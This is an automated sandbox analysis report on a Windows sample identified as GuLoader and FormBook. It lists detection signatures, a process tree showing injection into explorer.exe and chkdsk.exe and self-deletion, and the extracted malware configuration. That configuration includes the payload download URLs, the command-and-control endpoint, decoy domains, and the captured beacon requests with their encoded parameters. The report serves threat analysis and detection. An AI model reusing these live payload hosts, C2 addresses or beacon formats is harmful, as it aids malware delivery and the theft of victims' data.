Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report F63V4i8eZU.exe

Overview

General Information

Sample Name:F63V4i8eZU.exe
Analysis ID:450884
MD5:08730cdd286a4c9d46b38bb6545ac311
SHA1:001bb7b5b8d63e505661d7e4a178d08abe6bbad7
SHA256:cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • F63V4i8eZU.exe (PID: 1288 cmdline: 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: 08730CDD286A4C9D46B38BB6545AC311)
    • F63V4i8eZU.exe (PID: 772 cmdline: 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: 08730CDD286A4C9D46B38BB6545AC311)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6112 cmdline: /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x32c6c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: F63V4i8eZU.exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: F63V4i8eZU.exeVirustotal: Detection: 10%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
      Source: F63V4i8eZU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2
      Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
      Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.yellow-wink.com/nff/
      Source: Malware configuration extractorURLs: https://kinmirai.org/wp-content/bin_QVwo
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1Host: www.oubacm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1Host: www.mothererph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1Host: www.howtovvbucks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1Host: www.mikecdmusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1Host: www.pacleanfuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1Host: www.foeweifgoor73dz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1Host: www.thehomechef.globalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1Host: www.yellow-wink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1Host: www.amazonautomationbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1Host: www.ooweesports.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1Host: www.dunn-labs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1Host: www.tearor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 198.50.252.64 198.50.252.64
      Source: Joe Sandbox ViewIP Address: 212.32.237.90 212.32.237.90
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1Host: www.oubacm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1Host: www.mothererph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1Host: www.howtovvbucks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1Host: www.mikecdmusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1Host: www.pacleanfuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1Host: www.foeweifgoor73dz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1Host: www.thehomechef.globalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1Host: www.yellow-wink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1Host: www.amazonautomationbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1Host: www.ooweesports.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1Host: www.dunn-labs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1Host: www.tearor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/InstraCorp" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
      Source: unknownDNS traffic detected: queries for: kinmirai.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 19 Jul 2021 18:23:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: explorer.exe, 0000001D.00000000.448268826.00000000089F9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpString found in binary or memory: http://farmersschool.ge/bin_QVwEr224.bin
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://ocsp.digicert.com0O
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: http://survey-smiles.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato:300
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpString found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.bin
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpString found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllM
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/instra
      Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exeString found in binary or memory: https://www.digicert.com/CPS0
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: https://www.instra.com/?utm_medium=free_parking&utm_source=thehomechef.global
      Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmpString found in binary or memory: https://www.instra.com/en/hosting/web-hosting-packages/?utm_medium=free_parking&utm_source=thehomech
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownHTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
